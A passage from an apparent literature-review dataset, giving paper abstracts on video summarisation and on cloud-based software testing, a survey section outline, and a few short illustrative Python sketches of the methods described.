paper_content: Summarization is an essential requirement for achieving a more compact and interesting representation of sports video contents. We propose a framework that integrates highlights into play segments and reveal why we should still retain breaks. Experimental results show that fast detections of whistle sounds, crowd excitement, and text boxes can complement existing techniques for play-breaks and highlights localization. --- paper_title: Interface Design for MyInfo: a Personal News Demonstrator Combining Web and TV Content paper_content: This paper describes MyInfo, a novel interface for a personal news demonstrator that processes and combines content from TV and the web. 
We detail our design process from concept generation to focus group exploration to final design. Our design focuses on three issues: (i) ease-of-use, (ii) video summarization, and (iii) news personalization. With a single button press on the remote control, users access specific topics such as weather or traffic. In addition, users can play back personalized news content as a TV show, leaving themselves free to complete other tasks in their homes, while consuming the news.
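The CPR model cited earlier in this list casts summarization as maximizing an objective built from frame priority, summary continuity, and non-repetition. The toy function below only mimics that idea with made-up priorities, labels, weights, and a brute-force search over a very small frame set; it is not the optimization algorithm from the paper.

```python
from itertools import combinations

# Hypothetical per-frame priorities and crude "content labels" used to penalize repetition.
priority = [0.9, 0.2, 0.8, 0.85, 0.1, 0.7]
label    = ["goal", "crowd", "goal", "replay", "crowd", "replay"]

def cpr_score(frames, w_p=1.0, w_c=0.5, w_r=0.7):
    """Priority sum + continuity bonus for adjacent frames - repetition penalty."""
    p = sum(priority[i] for i in frames)
    c = sum(1 for a, b in zip(frames, frames[1:]) if b == a + 1)
    r = len(frames) - len({label[i] for i in frames})
    return w_p * p + w_c * c - w_r * r

def best_summary(k=3):
    """Exhaustively pick the k-frame subset with the highest CPR-style score."""
    return max(combinations(range(len(priority)), k), key=cpr_score)

print(best_summary())
```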
--- paper_title: Affective content detection using HMMs paper_content: This paper discusses a new technique for detecting affective events using Hidden Markov Models (HMM). To map low-level features of video data to high-level emotional events, we perform an empirical study on the relationship between emotional events and low-level features. After that, we compute simple low-level features that represent emotional characteristics and construct a token or observation vector by combining low-level features. The observation vector sequence is tested to detect emotional events through HMMs. We create two HMM topologies and test both topologies. The affective events are detected from our proposed models with good accuracy.
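The HMM-based affect detection entry above maps low-level feature tokens to emotional events. As a rough illustration only, the sketch below hard-codes a two-state model (neutral vs. affective) with invented transition and emission probabilities and runs standard Viterbi decoding over a token sequence; the actual paper builds and trains its HMM topologies from data.

```python
import numpy as np

states = ["neutral", "affective"]
tokens = ["low_motion", "high_motion", "loud_audio"]

# Invented model parameters for illustration (log-space to avoid underflow).
start = np.log([0.8, 0.2])
trans = np.log([[0.9, 0.1],
                [0.3, 0.7]])
emit  = np.log([[0.7, 0.2, 0.1],    # neutral   -> token probabilities
                [0.1, 0.4, 0.5]])   # affective -> token probabilities

def viterbi(obs):
    """Most likely state sequence for a list of observation tokens."""
    idx = [tokens.index(o) for o in obs]
    T, N = len(idx), len(states)
    delta = np.full((T, N), -np.inf)
    back = np.zeros((T, N), dtype=int)
    delta[0] = start + emit[:, idx[0]]
    for t in range(1, T):
        for j in range(N):
            scores = delta[t - 1] + trans[:, j]
            back[t, j] = np.argmax(scores)
            delta[t, j] = scores[back[t, j]] + emit[j, idx[t]]
    path = [int(np.argmax(delta[-1]))]
    for t in range(T - 1, 0, -1):
        path.append(int(back[t, path[-1]]))
    return [states[s] for s in reversed(path)]

obs = ["low_motion", "high_motion", "loud_audio", "loud_audio", "low_motion"]
print(list(zip(obs, viterbi(obs))))
```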
--- paper_title: Content-based multimedia information retrieval: State of the art and challenges paper_content: Extending beyond the boundaries of science, art, and culture, content-based multimedia information retrieval provides new paradigms and methods for searching through the myriad variety of media all over the world. This survey reviews 100 recent articles on content-based multimedia information retrieval and discusses their role in current research directions, which include browsing and search paradigms, user studies, affective computing, learning, semantic queries, new features and media types, high-performance indexing, and evaluation techniques. Based on the current state of the art, we discuss the major challenges for the future.
--- paper_title: Affective video content representation and modeling paper_content: This paper looks into a new direction in video content analysis - the representation and modeling of affective video content.
The affective content of a given video clip can be defined as the intensity and type of feeling or emotion (both are referred to as affect) that are expected to arise in the user while watching that clip. The availability of methodologies for automatically extracting this type of video content will extend the current scope of possibilities for video indexing and retrieval. For instance, we will be able to search for the funniest or the most thrilling parts of a movie, or the most exciting events of a sport program. Furthermore, as the user may want to select a movie not only based on its genre, cast, director and story content, but also on its prevailing mood, the affective content analysis is also likely to contribute to enhancing the quality of personalizing the video delivery to the user. We propose in this paper a computational framework for affective video content representation and modeling. This framework is based on the dimensional approach to affect that is known from the field of psychophysiology. According to this approach, the affective video content can be represented as a set of points in the two-dimensional (2-D) emotion space that is characterized by the dimensions of arousal (intensity of affect) and valence (type of affect). We map the affective video content onto the 2-D emotion space by using the models that link the arousal and valence dimensions to low-level features extracted from video data. This results in the arousal and valence time curves that, either considered separately or combined into the so-called affect curve, are introduced as reliable representations of expected transitions from one feeling to another along a video, as perceived by a viewer.
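The arousal/valence framework above combines low-level signals into smooth time curves. The snippet below sketches only the arousal side under simple assumptions: three synthetic per-second feature tracks (motion activity, cut density, audio energy) are normalized, weighted, and smoothed with a moving-average kernel; the weights, kernel length, and synthetic data are arbitrary stand-ins, not the models from the paper.

```python
import numpy as np

rng = np.random.default_rng(0)
seconds = 120
# Synthetic per-second low-level features standing in for real measurements;
# the step after t=80 simulates an "exciting" stretch of the video.
motion    = np.clip(rng.normal(0.3, 0.10, seconds) + (np.arange(seconds) > 80) * 0.4, 0, 1)
cut_rate  = np.clip(rng.normal(0.2, 0.05, seconds) + (np.arange(seconds) > 80) * 0.3, 0, 1)
audio_rms = np.clip(rng.normal(0.4, 0.10, seconds), 0, 1)

def normalize(x):
    return (x - x.min()) / (x.max() - x.min() + 1e-9)

def arousal_curve(feats, weights=(0.5, 0.3, 0.2), win=9):
    """Weighted sum of normalized features, smoothed by a moving average."""
    combined = sum(w * normalize(f) for w, f in zip(weights, feats))
    kernel = np.ones(win) / win
    return np.convolve(combined, kernel, mode="same")

curve = arousal_curve([motion, cut_rate, audio_rms])
peak = int(np.argmax(curve))
print(f"arousal peaks around t={peak}s (value {curve[peak]:.2f})")
```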
Users learn from the computer-generated summaries, although less than from authors' summaries. They initially find computer-generated summaries less coherent, but quickly grow accustomed to them. --- paper_title: Summarizing wearable video paper_content: "We want to record our entire life by video" is the motivation of this research. Developing wearable devices and huge storage devices will make it possible to keep entire life by video. We could capture 70 years of our life, however, the problem is how to handle such a huge amount of data. Automatic summarization based on personal interest should be required. In this paper we propose an approach to the automatic structuring and summarization of wearable video. (Wearable video is our abbreviation of "video captured by a wearable camera".) In our approach, we make use of a wearable camera and a sensor of brain waves. The video is firstly structured by objective features of video, and the shots are rated by subjective measures based on brain waves. The approach is very successful for real world experiments and it automatically extracted all the events that the subjects reported they had felt interesting. --- paper_title: Hierarchical video summarization based on context clustering paper_content: A personalized video summary is dynamically generated in our video personalization and summarization system based on user preference and usage environment. The three-tier personalization system adopts the server-middleware-client architecture in order to maintain, select, adapt, and deliver rich media content to the user. The server stores the content sources along with their corresponding MPEG-7 metadata descriptions. In this paper, the metadata includes visual semantic annotations and automatic speech transcriptions. Our personalization and summarization engine in the middleware selects the optimal set of desired video segments by matching shot annotations and sentence transcripts with user preferences. Besides finding the desired contents, the objective is to present a coherent summary. There are diverse methods for creating summaries, and we focus on the challenges of generating a hierarchical video summary based on context information. In our summarization algorithm, three inputs are used to generate the hierarchical video summary output. These inputs are (1) MPEG-7 metadata descriptions of the contents in the server, (2) user preference and usage environment declarations from the user client, and (3) context information including MPEG-7 controlled term list and classification scheme. In a video sequence, descriptions and relevance scores are assigned to each shot. Based on these shot descriptions, context clustering is performed to collect consecutively similar shots to correspond to hierarchical scene representations. The context clustering is based on the available context information, and may be derived from domain knowledge or rules engines. Finally, the selection of structured video segments to generate the hierarchical summary efficiently balances between scene representation and shot selection. --- paper_title: Dynamic video summarization of home video paper_content: An increasing number of people own and use camcorders to make videos that capture their experiences and document their lives. These videos easily add up to many hours of material. Oddly, most of them are put into a storage box and never touched or watched again. The reasons for this are manifold. 
Firstly, the raw video material is unedited, and is therefore long-winded and lacking visually appealing effects. Video editing would help, but, it is still too time-consuming; people rarely find the time to do it. Secondly, watching the same tape more than a few times can be boring, since the video lacks any variation or surprise during playback. Automatic video abstracting algorithms can provide a method for processing videos so that users will want to play the material more often. However, existing automatic abstracting algorithms have been designed for feature films, newscasts or documentaries, and thus are inappropriate for home video material and raw video footage in general. In this paper, we present new algorithms for generating amusing, visually appealing and variable video abstracts of home video material automatically. They make use of a new, empirically motivated approach, also presented in the paper, to cluster time-stamped shots hierarchically into meaningful units. Last but not least, we propose a simple and natural extension of the way people acquire video - so-called on-the-fly annotations - which will allow a completely new set of applications on raw video footage as well as enable better and more selective automatic video abstracts. Moreover, our algorithms are not restricted to home video but can also be applied to raw video footage in general. --- paper_title: Efficient retrieval of life log based on context and content paper_content: In this paper, we present continuous capture of our life log with various sensors plus additional data and propose effective retrieval methods using this context and content. Our life log system contains video, audio, acceleration sensor, gyro, GPS, annotations, documents, web pages, and emails. In our previous studies, we showed our retrieval methodology [8], [9], which mainly depends on context information from sensor data. In this paper, we extend our methodology with additional functions. They are (1) spatio-temporal sampling for extraction of key frames for summarization; and (2) conversation scene detection. With the first of these, key frames for the summarization are extracted using time and location data (GPS). Because our life log captures dense location data, we can also make use of derivatives of location data, that is, speed and acceleration in the movement of the person. The summarizing key frames are made using them. We also introduce content analysis for conversation scene detection. In our previous work, we have investigated context-based retrieval, which differs from the majority of studies in image/video retrieval focusing on content-based retrieval. In this paper, we introduce visual and audio data content analysis for conversation scene detection. The detection of conversation scenes will be very important tags for our life log data retrieval. We describe our present system and additional functions, as well as preliminary results for the additional functions. --- paper_title: Using MPEG-7 and MPEG-21 for personalizing video paper_content: As multimedia content has proliferated over the past several years, users have begun to expect that content be easily accessed according to their own preferences. One of the most effective ways to do this is through using the MPEG-7 and MPEG-21 standards, which can help address the issues associated with designing a video personalization and summarization system in heterogeneous usage environments. 
This three-tier architecture provides a standards-compliant infrastructure that, in conjunction with our tools, can help select, adapt, and deliver personalized video summaries to users. In extending our summarization research, we plan to explore semantic similarities across multiple simultaneous news media sources and to abstract summaries for different viewpoints. Doing so will allow us to track a semantic topic as it evolves into the future. As a result, we should be able to summarize news repositories into a smaller collection of topic threads. --- paper_title: The CPR model for summarizing video paper_content: Most past work on video summarization has been based on selecting key frames from videos. We propose a model of video summarization based on three important parameters: Priority (of frames), Continuity (of the summary), and non-Repetition (of the summary). In short, a summary must include high priority frames, must be continuous and non-repetitive. An optimal summary is one that maximizes an objective function based on these three parameters. We develop formal definitions of all these concepts and provide algorithms to find optimal summaries. We briefly report on the performance of these algorithms. --- paper_title: Framework for personalized multimedia summarization paper_content: We extend and validate methods of personalization to the domain of automatically created multimedia summaries. Based on a previously performed user study of 59 people we derived a mapping of personality profile information to preferred multimedia features. This article describes our summarization algorithm. We define constraints for automatic summary generation. Summaries should consist of contiguous segments of full shots, with duration proportional to the log of video length, selected by an objective function of total "importance" of features, with heuristic rules for deciding the "best" combination of length and importance. We validated the summaries with a user study of 32 people. They were asked to answer a shortened series of personality queries. Using this current user profile, together with the earlier genre-specific reduced mapping and with automatically derived features, we automatically generated two summaries for each video: one optimally matched, and one matched to the "opposite" personality. Each user evaluated both summaries on a preference scale for four each of: news, talk show, and music videos. From a statistical analysis we find statistically significant evidence of the effectiveness of personalization on news and music videos, with no evidence of user subpopulations. We conclude for these genres that our claim, of a universal mapping from certain measured personality traits to the computable creation of preferred multimedia summaries, is supported. --- paper_title: Efficient access to video content in a unified framework paper_content: Book contents' browsing and retrieval have been greatly facilitated by its Table-of-Contents (ToC) and Index, respectively. Unfortunately, today's video lacks such powerful mechanisms. In this paper, we explore and present novel techniques for constructing video ToC and Index. Furthermore, we explore the relationship between video browsing and retrieval and propose a unified framework: to incorporate both entities in a seamless way. Experimental results on real-world video clips justify our proposed framework for providing efficient access to video content. 
--- paper_title: The priority curve algorithm for video summarization paper_content: In this paper, we introduce the concept of a priority curve associated with a video. We then provide an algorithm that can use the priority curve to create a summary (of a desired length) of any video. The summary thus created exhibits nice continuity properties and also avoids repetition. We have implemented the priority curve algorithm (PCA) and compared it with other summarization algorithms in the literature. We show that PCA is faster than existing algorithms and also produces better quality summaries. The quality of summaries was evaluated by a group of 200 students in Naples, Italy, who watched soccer videos. We also briefly describe a soccer video summarization system we have built on using the PCA architecture and various (classical) image processing algorithms. --- paper_title: Learning personalized video highlights from detailed MPEG-7 metadata paper_content: We present a new framework for generating personalized video digests from detailed event metadata. In the new approach high level semantic features (e.g., number of offensive events) are extracted from an existing metadata signal using time windows (e.g., features within 16 sec. intervals). Personalized video digests are generated using a supervised learning algorithm which takes as input examples of important/unimportant events. Window-based features are extracted from the metadata and used to train the system and build a classifier that, given metadata for a new video, classifies segments into important and unimportant, according to a specific user, to generate personalized video digests. Our experimental results using soccer video suggest that extracting high level semantic information from existing metadata can be used effectively (80% precision and 85% recall using cross validation) in generating personalized video digests. --- paper_title: Video summarization based on the psychological unfolding of a drama paper_content: This paper proposes a method of composing digests of TV videos based on their psychological unfolding. Most of the studies of video summarization to date have been based on the video structure, such as cuts or objects in the video. It is generally considered, however, that the observer of a TV drama emphasizes instead the psychological unfolding of the video content (such as the climax). However, no method of summarizing a drama based on the psychological aspect of the video has been proposed. Track structures [such as cutting, lines spoken by the actors, BGM (background music), and sound effects] constitute physical components, and the dramatist skillfully manipulates the time structure based on his empirical knowledge in order to present a particular psychological impression. This paper proposes a method in which the psychologically important part is detected on the basis of empirical knowledge as a corresponding time-series pattern of the track structure, and a summarized video is generated. As an experiment, the proposed method was applied to a TV drama, and the time length was reduced to approximately 1/14. Subjective evaluation experiments show that the proposed method preserves the content of the main plot, with naturalness of extraction, thus indicating the usefulness of the proposed method. © 2002 Wiley Periodicals, Inc. Syst Comp Jpn, 33(11): 39–49, 2002; Published online in Wiley InterScience (www.interscience.wiley.com). 
DOI 10.1002/scj.10066 --- paper_title: Highlights for more complete sports video summarization paper_content: Summarization is an essential requirement for achieving a more compact and interesting representation of sports video contents. We propose a framework that integrates highlights into play segments and reveal why we should still retain breaks. Experimental results show that fast detections of whistle sounds, crowd excitement, and text boxes can complement existing techniques for play-breaks and highlights localization. --- paper_title: Interface Design for MyInfo: a Personal News Demonstrator Combining Web and TV Content paper_content: This paper describes MyInfo, a novel interface for a personal news demonstrator that processes and combines content from TV and the web. We detail our design process from concept generation to focus group exploration to final design. Our design focuses on three issues: (i) ease-of-use, (ii) video summarization, and (iii) news personalization. With a single button press on the remote control, users access specific topics such as weather or traffic. In addition, users can play back personalized news content as a TV show, leaving themselves free to complete other tasks in their homes, while consuming the news. ---
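To make the priority-driven selection idea in the CPR-model and priority-curve entries above concrete, here is a minimal Python sketch; it is not the authors' algorithms. The shots are hypothetical (start, end, priority) tuples, and the summary greedily keeps the highest-priority shots that fit a time budget, replayed in chronological order. The real CPR model additionally optimizes continuity and non-repetition rather than using a single greedy pass.

```python
# Hypothetical shot list: (start_sec, end_sec, priority score in [0, 1]).
shots = [
    (0, 12, 0.20), (12, 30, 0.85), (30, 41, 0.40),
    (41, 70, 0.90), (70, 95, 0.15), (95, 110, 0.65),
]

def summarize(shots, budget_sec):
    """Greedy selection: take the highest-priority shots that fit the
    time budget, then play them back in chronological order so the
    summary stays roughly continuous."""
    chosen, used = [], 0.0
    for shot in sorted(shots, key=lambda s: s[2], reverse=True):
        length = shot[1] - shot[0]
        if used + length <= budget_sec:
            chosen.append(shot)
            used += length
    return sorted(chosen, key=lambda s: s[0])

print(summarize(shots, budget_sec=60))
```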
Title: Video summarisation: A conceptual framework and survey of the state of the art
Section 1: Introduction
Description 1: Introduce the growing need for video summarisation and give an overview of the paper's goals and structure.
Section 2: A conceptual framework for video summarisation
Description 2: Present a conceptual framework for video summarisation, including the rationale and basis for categorising video summarisation techniques and summaries.
Section 3: Techniques for summarising video
Description 3: Describe the different techniques for video summarisation classified into internal, external, and hybrid techniques.
Section 4: Video summaries produced by video summarisation techniques
Description 4: Discuss the various types of video summaries produced by internal, external, and hybrid techniques.
Section 5: Applications of video summarisation
Description 5: Outline different applications of video summarisation and how they leverage the benefits of summarised video content.
Section 6: Internal summarisation techniques and summaries
Description 6: Review internal summarisation techniques and the types of summaries they produce.
Section 7: External summarisation techniques and summaries
Description 7: Describe external summarisation techniques, how they operate, and the kinds of summaries they generate.
Section 8: Hybrid summarisation techniques and summaries
Description 8: Discuss hybrid summarisation techniques and the resultant summaries they produce by combining both internal and external information.
Section 9: Challenges and recommendations for future directions
Description 9: Identify challenges faced by current summarisation techniques and provide recommendations for future research directions in video summarisation.
Section 10: Concluding discussion
Description 10: Summarise the key points discussed in the paper and the importance of future research directions to address existing challenges in video summarisation.
A Survey of Software Testing in the Cloud
9
--- paper_title: Adoption issues for cloud computing paper_content: Cloud computing allows users to use only a Web browser to receive computing services via the Internet. Users only need to pay for the services they actually use. It appears that a wide adoption of cloud computing in the foreseeable future is inevitable, and its adoption will bring about a sea change in the pricing and distribution practices for both software and hardware. There are, however, various issues that will impede adoption of cloud computing. Most of them can be solved. We discuss the status of cloud computing today and various adoption issues. We also provide a market prognosis. --- paper_title: A model-driven approach for automating mobile applications testing paper_content: Software testing faces up several challenges. One out of these is the opposition between time-to-market software delivery and the excessive length of testing activities. The latter results from the growth of the application complexity along with the diversity of handheld devices. The economical competition, branding impose zero-defect products, putting forward testing as an even more crucial activity. In this paper, we describe a Domain-Specific Modeling Language (DSML) built upon an industrial platform (a test bed) which aims to automate mobile application checking. A key characteristic of this DSML is its ability to cope with variability in the spirit of software product line engineering. We discuss this DSML as part of a tool suite enabling the test of remote devices having variable features. --- paper_title: Cloud Computing – Issues, Research and Implementations paper_content: "Cloud" computing – a relatively recent term, builds on decades of research in virtualization, distributed computing, utility computing, and more recently networking, web and software services. It implies a service oriented architecture, reduced information technology overhead for the end-user, great flexibility, reduced total cost of ownership, on-demand services and many other things. This paper discusses the concept of “cloud” computing, some of the issues it tries to address, related research topics, and a “cloud” implementation available today. --- paper_title: Software Testing as an Online Service: Observations from Practice paper_content: The objective of this qualitative study was to explore and understand the conditions that influence software testing as an online service and elicit important research issues. Interviews were conducted with managers from eleven organizations. The study used qualitative grounded theory as its research method. The results indicate that the demand for software testing as an online service is on the rise and is influenced by conditions such as the level of domain knowledge needed to effectively test an application, flexibility and cost effectiveness as benefits, security and pricing as top requirements, cloud computing as the delivery mode and the need for software testers to hone their skills. Potential research areas suggested include application areas best suited for online software testing, pricing and handling of test data among others. --- paper_title: Testing as a Service over Cloud paper_content: Testing-as-a-service (TaaS) is a new model to provide testing capabilities to end users. Users save the cost of complicated maintenance and upgrade effort, and service providers can upgrade their services without impact on the end-users. 
Due to uneven volumes of concurrent requests, it is important to address the elasticity of TaaS platform in a cloud environment. Scheduling and dispatching algorithms are developed to improve the utilization of computing resources. We develop a prototype of TaaS over cloud, and evaluate the scalability of the platform by increasing the test task load, analyze the distribution of computing time on test task scheduling and test task processing over the cloud, and examine the performance of proposed algorithms by comparing others --- paper_title: Customizing Virtual Machine with Fault Injector by Integrating with SpecC Device Model for a Software Testing Environment D-Cloud paper_content: D-Cloud is a software testing environment for dependable parallel and distributed systems using cloud computing technology. We use Eucalyptus as cloud management software to manage virtual machines designed based on QEMU, called FaultVM, which have a fault injection mechanism. D-Cloud enables the test procedures to be automated using a large amount of computing resources in the cloud by interpreting the system configuration and the test scenario written in XML in D-Cloud front end and enables tests including hardware faults by emulating hardware faults by FaultVM flexibly. In the present paper, we describe the customization facility of FaultVM used to add new device models. We use SpecC, which is a system description language, to describe the behavior of devices, and a simulator generated from the description by SpecC is linked and integrated into FaultVM. This also makes the definition and injection of faults flexible without the modification of the original QEMU source codes. This facility allows D-Cloud to be used to test distributed systems with customized devices. --- paper_title: Splitter: a proxy-based approach for post-migration testing of web applications paper_content: The benefits of virtualized IT environments, such as compute clouds, have drawn interested enterprises to migrate their applications onto new platforms to gain the advantages of reduced hardware and energy costs, increased flexibility and deployment speed, and reduced management complexity. However, the process of migrating a complex application takes a considerable amount of effort, particularly when performing post-migration testing to verify that the application still functions correctly in the target environment. The traditional approach of test case generation and execution can take weeks and synthetic test cases may not adequately reflect actual application usage. In this paper, we propose and evaluate a black-box approach for post-migration testing of Web applications without manually creating test cases. A Web proxy is put in front of the production application to intercept all requests from real users, and these requests are simultaneously sent to the production and migrated applications. Results generated by both applications are then compared, and mismatches due to migration problems can be easily detected and presented to testing teams for resolution. We implement this approach in Splitter, a software module that is deployed as a reverse Web proxy. Through our evaluation using a number of real applications, we show that it Splitter can effectively automate post-migration testing while also reduce the number of mismatches that must be manually inspected. Equally important, it imposes a relatively small performance overhead on the production environment. 
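As a rough illustration of the mirrored-request idea behind Splitter, the Python sketch below forwards the same request paths to a production and a migrated deployment and diffs the responses. The host names and request paths are hypothetical, and a real proxy would replay live user traffic in front of the production system rather than iterate over a fixed list.

```python
import urllib.error
import urllib.request
from difflib import unified_diff

# Hypothetical endpoints for the two deployments under comparison.
PRODUCTION = "http://production.example.com"
MIGRATED = "http://migrated.example.com"

def fetch(base_url, path):
    """Return (status, body) for a GET request, including HTTP error responses."""
    try:
        with urllib.request.urlopen(base_url + path, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", errors="replace")

def mirror_and_compare(path):
    """Send the same request to both deployments and report mismatches."""
    prod_status, prod_body = fetch(PRODUCTION, path)
    migr_status, migr_body = fetch(MIGRATED, path)
    if prod_status != migr_status:
        print(f"{path}: status mismatch {prod_status} vs {migr_status}")
    if prod_body != migr_body:
        diff = "\n".join(unified_diff(prod_body.splitlines(),
                                      migr_body.splitlines(),
                                      "production", "migrated", lineterm=""))
        print(f"{path}: body mismatch\n{diff}")

if __name__ == "__main__":
    for path in ["/", "/login", "/catalog?page=1"]:
        mirror_and_compare(path)
```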
--- paper_title: Testing as a Service over Cloud paper_content: Testing-as-a-service (TaaS) is a new model to provide testing capabilities to end users. Users save the cost of complicated maintenance and upgrade effort, and service providers can upgrade their services without impact on the end-users. Due to uneven volumes of concurrent requests, it is important to address the elasticity of TaaS platform in a cloud environment. Scheduling and dispatching algorithms are developed to improve the utilization of computing resources. We develop a prototype of TaaS over cloud, and evaluate the scalability of the platform by increasing the test task load, analyze the distribution of computing time on test task scheduling and test task processing over the cloud, and examine the performance of proposed algorithms by comparing others --- paper_title: Open Cirrus: A Global Cloud Computing Testbed paper_content: Open Cirrus is a cloud computing testbed that, unlike existing alternatives, federates distributed data centers. It aims to spur innovation in systems and applications research and catalyze development of an open source service stack for the cloud. --- paper_title: Testing Tasks Management in Testing Cloud Environment paper_content: In testing Cloud environment testing tasks requested by different tenants have many uncertainties. The arriving time, deadline and the number of tasks are unknown in advance. Especially, the relationships between testing tasks and testing environments are very complex. How to efficiently manage these tasks is really a challenging problem. This paper studies the special features of testing tasks and presents a task management framework. We analyze the dependencies and conflicts associated with testing tasks and their related runtime environments, using rule matching mechanism to derive the relationships supported by domain knowledge. Based on these analyses, improved algorithms are introduced to cluster and dynamically schedule testing tasks to minimize the make-span or meet deadlines with the consideration of testing task resource requirements and Cloud resource utilization balance at the same time. A fault tolerance mechanism is built to cope with testing errors, whose results are studied to ameliorate clustering and scheduling algorithms. A suite of experiments compares the effectiveness of the proposed approach with other algorithms. --- paper_title: Modeling and testing of cloud applications paper_content: What is a cloud application precisely? In this paper, we formulate a computing cloud as a kind of graph, a computing resource such as services or intellectual property access rights as an attribute of a graph node, and the use of a resource as a predicate on an edge of the graph. We also propose to model cloud computation semantically as a set of paths in a subgraph of the cloud such that every edge contains a predicate that is evaluated to be true. Finally, we present algorithms to compose cloud computations and a family of model-based testing criteria to support the testing of cloud applications. --- paper_title: D-Cloud: Design of a Software Testing Environment for Reliable Distributed Systems Using Cloud Computing Technology paper_content: In this paper, we propose a software testing environment, called D-Cloud, using cloud computing technology and virtual machines with fault injection facility. 
Nevertheless, the importance of high dependability in a software system has recently increased, and exhaustive testing of software systems is becoming expensive and time-consuming, and, in many cases, sufficient software testing is not possible. In particular, it is often difficult to test parallel and distributed systems in the real world after deployment, although reliable systems, such as high-availability servers, are parallel and distributed systems. D-Cloud is a cloud system which manages virtual machines with fault injection facility. D-Cloud sets up a test environment on the cloud resources using a given system configuration file and executes several tests automatically according to a given scenario. In this scenario, D-Cloud enables fault tolerance testing by causing device faults by virtual machine. We have designed the D-Cloud system using Eucalyptus software and a description language for system configuration and the scenario of fault injection written in XML. We found that the D-Cloud system, which allows a user to easily set up and test a distributed system on the cloud and effectively reduces the cost and time of testing. --- paper_title: Research in concurrent software testing: a systematic review paper_content: The current increased demand for distributed applications in domains such as web services and cloud computing has significantly increased interest in concurrent programming. This demand in turn has resulted in new testing methodologies for such systems, which take account of the challenges necessary to test these applications. This paper presents a systematic review of the published research related to concurrent testing approaches, bug classification and testing tools. A systematic review is a process of collection, assessment and interpretation of the published papers related to a specific search question, designed to provide a background for further research. The results include information about the research relationships and research teams that are working in the different areas of concurrent programs testing. --- paper_title: Modeling and testing of cloud applications paper_content: What is a cloud application precisely? In this paper, we formulate a computing cloud as a kind of graph, a computing resource such as services or intellectual property access rights as an attribute of a graph node, and the use of a resource as a predicate on an edge of the graph. We also propose to model cloud computation semantically as a set of paths in a subgraph of the cloud such that every edge contains a predicate that is evaluated to be true. Finally, we present algorithms to compose cloud computations and a family of model-based testing criteria to support the testing of cloud applications. --- paper_title: Software Engineering Challenges for Migration to the Service Cloud Paradigm: Ongoing Work in the REMICS Project paper_content: This paper presents on-going work in a research project on defining methodology and tools for model-driven migration of legacy applications to a service-oriented architecture with deployment in the cloud, i.e. the Service Cloud paradigm. We have performed a comprehensive state of the art analysis and present some findings here. In parallel, the two industrial participants in the project have specified their requirements and expectations regarding modernization of their applications. The SOA paradigm implies the breakdown of architecture into high-grain components providing business services. 
For taking advantage of the services of cloud computing technologies, the clients' architecture should be decomposed, decoupled and be made scalable. Also requirements regarding servers, data storage and security, networking and response time, business models and pricing should be projected. We present software engineering challenges related to these aspects and examples of these in the context of one of the industrial cases in the project. --- paper_title: Research Issues for Software Testing in the Cloud paper_content: Cloud computing is causing a paradigm shift in the provision and use of computing services, away from the traditional desktop form to online services. This implies that the manner in which these computing services are tested should also change. This paper discusses the research issues that cloud computing imposes on software testing. These issues were gathered during interviews with industry practitioners from eleven software organizations. The interviews were analyzed using qualitative grounded theory method. Findings of the study were compared with existing literature. The research issues were categorized according to application, management, legal and financial issues. By addressing these issues, researchers can offer reliable recommendation for practitioners in the industry. --- paper_title: Engineering the cloud from software modules paper_content: Cloud computing faces many of the challenges and difficulties of distributed and parallel software. While the service interface hides the actual application from the remote user, the application developer still needs to come to terms with distributed software that needs to run on dynamic clusters and operate under a wide range of configurations. In this paper, we outline our vision of a model and runtime platform for the development, deployment, and management of software applications on the cloud. Our basic idea is to turn the notion of software module into a first class entity used for management and distribution that can be autonomously managed by the underlying software fabric of the cloud. In the paper we present our model, outline an initial implementation, and describe a first application developed using the ideas presented in the paper. --- paper_title: Parallel symbolic execution for automated real-world software testing paper_content: This paper introduces Cloud9, a platform for automated testing of real-world software. Our main contribution is the scalable parallelization of symbolic execution on clusters of commodity hardware, to help cope with path explosion. Cloud9 provides a systematic interface for writing "symbolic tests" that concisely specify entire families of inputs and behaviors to be tested, thus improving testing productivity. Cloud9 can handle not only single-threaded programs but also multi-threaded and distributed systems. It includes a new symbolic environment model that is the first to support all major aspects of the POSIX interface, such as processes, threads, synchronization, networking, IPC, and file I/O. We show that Cloud9 can automatically test real systems, like memcached, Apache httpd, lighttpd, the Python interpreter, rsync, and curl. We show how Cloud9 can use existing test suites to generate new test cases that capture untested corner cases (e.g., network stream fragmentation). Cloud9 can also diagnose incomplete bug fixes by analyzing the difference between buggy paths before and after a patch. 
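The following toy Python sketch conveys the general idea of splitting a symbolic execution tree across workers, in the spirit of the parallel symbolic execution work above; it is not Cloud9's algorithm. Branch decisions are plain booleans, there is no constraint solver, and each worker process exhaustively explores the subtree under a fixed prefix of decisions.

```python
from itertools import product
from multiprocessing import Pool

def program_under_test(branches):
    """Toy program whose execution path is fully determined by three
    boolean 'symbolic' decisions; returns a label for the path taken."""
    a, b, c = branches
    path = []
    path.append("a-true" if a else "a-false")
    path.append("b-and-a" if (b and a) else "not(b-and-a)")
    path.append("c-true" if c else "c-false")
    return tuple(path)

def explore_subtree(prefix, depth=3):
    """Exhaustively explore all branch decisions below a fixed prefix."""
    paths = set()
    remaining = depth - len(prefix)
    for suffix in product([False, True], repeat=remaining):
        paths.add(program_under_test(list(prefix) + list(suffix)))
    return paths

if __name__ == "__main__":
    # Statically partition the tree by fixing the first decision,
    # then hand each subtree to a separate worker process.
    prefixes = [(False,), (True,)]
    with Pool(processes=len(prefixes)) as pool:
        results = pool.map(explore_subtree, prefixes)
    covered = set().union(*results)
    print(f"{len(covered)} distinct paths covered")
```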
--- paper_title: Customizing Virtual Machine with Fault Injector by Integrating with SpecC Device Model for a Software Testing Environment D-Cloud paper_content: D-Cloud is a software testing environment for dependable parallel and distributed systems using cloud computing technology. We use Eucalyptus as cloud management software to manage virtual machines designed based on QEMU, called FaultVM, which have a fault injection mechanism. D-Cloud enables the test procedures to be automated using a large amount of computing resources in the cloud by interpreting the system configuration and the test scenario written in XML in D-Cloud front end and enables tests including hardware faults by emulating hardware faults by FaultVM flexibly. In the present paper, we describe the customization facility of FaultVM used to add new device models. We use SpecC, which is a system description language, to describe the behavior of devices, and a simulator generated from the description by SpecC is linked and integrated into FaultVM. This also makes the definition and injection of faults flexible without the modification of the original QEMU source codes. This facility allows D-Cloud to be used to test distributed systems with customized devices. --- paper_title: Testing in the Cloud: Exploring the Practice paper_content: As applications and services migrate to the cloud, testing will follow the same trend. Therefore, organizations must understand the dynamics of cloud-based testing. This article presents interviews with eight organizations that use cloud computing. The results suggest that cloud computing can make testing faster and enhance the delivery of testing services. Cloud 